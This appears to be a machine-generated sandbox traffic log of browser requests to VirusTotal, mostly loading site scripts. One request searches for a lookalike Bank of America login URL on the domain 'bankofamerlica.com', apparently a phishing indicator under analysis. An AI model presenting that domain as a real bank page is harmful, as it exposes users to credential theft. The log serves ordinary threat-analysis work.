Source: global traffic	HTTP traffic detected: GET /gui/87379.10e7a557de64c909c07d.js HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.0.1736959498.0.0.0
Source: global traffic	HTTP traffic detected: GET /gui/64098.3377bd9636d2bbe06657.js HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.0.1736959498.0.0.0
Source: global traffic	HTTP traffic detected: GET /gui/85236.f2afef810314bd199050.js HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.0.1736959498.0.0.0
Source: global traffic	HTTP traffic detected: GET /gui/5200.cbf2a82371bebc862a72.js HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.0.1736959498.0.0.0
Source: global traffic	HTTP traffic detected: GET /gui/88687.5467bba500c091961968.js HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.0.1736959498.0.0.0
Source: global traffic	HTTP traffic detected: GET /gui/8405.5eb49c1a7107f741455b.js HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.0.1736959498.0.0.0
Source: global traffic	HTTP traffic detected: GET /gui/53967.5b914cf2886ab055ed88.js HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.0.1736959498.0.0.0
Source: global traffic	HTTP traffic detected: GET /gui/75884.b085fb19887c849fbac2.js HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.0.1736959498.0.0.0
Source: global traffic	HTTP traffic detected: GET /gui/1700.226b3fc193308e865f4c.js HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.0.1736959498.0.0.0
Source: global traffic	HTTP traffic detected: GET /gui/71254.5c4108391eb7e4bca702.js HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.0.1736959498.0.0.0
Source: global traffic	HTTP traffic detected: GET /gui/67920.83f748ec82f4e379de06.js HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.0.1736959498.0.0.0
Source: global traffic	HTTP traffic detected: GET /gui/40946.52e58c8b2a8b55ad5067.js HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.0.1736959498.0.0.0
Source: global traffic	HTTP traffic detected: GET /gui/38744.5bea5a50b3de4fbaba50.js HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.0.1736959498.0.0.0
Source: global traffic	HTTP traffic detected: GET /gui/88279.532f3865c685074ed6bc.js HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.0.1736959498.0.0.0
Source: global traffic	HTTP traffic detected: GET /gui/58686.f1ac5a4a1e085aafcbb6.js HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.0.1736959498.0.0.0
Source: global traffic	HTTP traffic detected: GET /gui/25390.cc03726ca6fe66c5a420.js HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.0.1736959498.0.0.0
Source: global traffic	HTTP traffic detected: GET /gui/91755.8f8deca562ce3cc33280.js HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.0.1736959498.0.0.0
Source: global traffic	HTTP traffic detected: GET /gui/8405.5eb49c1a7107f741455b.js HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.0.1736959498.0.0.0
Source: global traffic	HTTP traffic detected: GET /gui/26149.f619930a733b68a09edc.js HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.0.1736959498.0.0.0
Source: global traffic	HTTP traffic detected: GET /gui/88687.5467bba500c091961968.js HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.0.1736959498.0.0.0
Source: global traffic	HTTP traffic detected: GET /gui/38510.7c8301f028cbc9e184e9.js HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.0.1736959498.0.0.0
Source: global traffic	HTTP traffic detected: GET /gui/75884.b085fb19887c849fbac2.js HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.0.1736959498.0.0.0
Source: global traffic	HTTP traffic detected: GET /gui/2576.04847b50f85afec0428e.js HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.0.1736959498.0.0.0
Source: global traffic	HTTP traffic detected: GET /gui/71254.5c4108391eb7e4bca702.js HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.0.1736959498.0.0.0
Source: global traffic	HTTP traffic detected: GET /gui/66587.25f73431adda110b0a5d.js HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.0.1736959498.0.0.0
Source: global traffic	HTTP traffic detected: GET /gui/67920.83f748ec82f4e379de06.js HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.0.1736959498.0.0.0
Source: global traffic	HTTP traffic detected: GET /gui/38744.5bea5a50b3de4fbaba50.js HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.0.1736959498.0.0.0
Source: global traffic	HTTP traffic detected: GET /gui/36980.df97ec20ffdaef039122.js HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.0.1736959498.0.0.0
Source: global traffic	HTTP traffic detected: GET /gui/25390.cc03726ca6fe66c5a420.js HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.0.1736959498.0.0.0
Source: global traffic	HTTP traffic detected: GET /gui/91755.8f8deca562ce3cc33280.js HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.0.1736959498.0.0.0
Source: global traffic	HTTP traffic detected: GET /gui/26149.f619930a733b68a09edc.js HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.0.1736959498.0.0.0
Source: global traffic	HTTP traffic detected: GET /gui/38510.7c8301f028cbc9e184e9.js HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.0.1736959498.0.0.0
Source: global traffic	HTTP traffic detected: GET /gui/2576.04847b50f85afec0428e.js HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.0.1736959498.0.0.0
Source: global traffic	HTTP traffic detected: GET /gui/36980.df97ec20ffdaef039122.js HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.0.1736959498.0.0.0
Source: global traffic	HTTP traffic detected: GET /ui/search?limit=20&relationships%5Bcomment%5D=author%2Citem&query=https%3A%2F%2Fonline.access.secure.bankofamerlica.com%2Flogin%2Fsign-in%2FsignOnV2Screen.go HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"x-app-version: v1x334x1X-Tool: vt-ui-mainsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36content-type: application/jsonaccept: application/jsonAccept-Ianguage: en-US,en;q=0.9,es;q=0.8X-VT-Anti-Abuse-Header: MTI1NTAxNzEzMDctWkc5dWRDQmlaU0JsZG1scy0xNzM2OTU5NTAyLjk2Nw==sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.0.1736959498.0.0.0
Source: global traffic	HTTP traffic detected: GET /gui/25924.b3a6356de76617e73c99.js HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.0.1736959498.0.0.0
Source: global traffic	HTTP traffic detected: GET /gui/56053.5e8324e3c0b62ad10cdf.js HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.0.1736959498.0.0.0
Source: global traffic	HTTP traffic detected: GET /gui/47031.059aa26916e6bb9fe21d.js HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.0.1736959498.0.0.0
Source: global traffic	HTTP traffic detected: GET /gui/59084.21fce51b78aa667002e8.js HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.0.1736959498.0.0.0
Source: global traffic	HTTP traffic detected: GET /gui/32827.e9df234ac022e0ec6707.js HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.0.1736959498.0.0.0
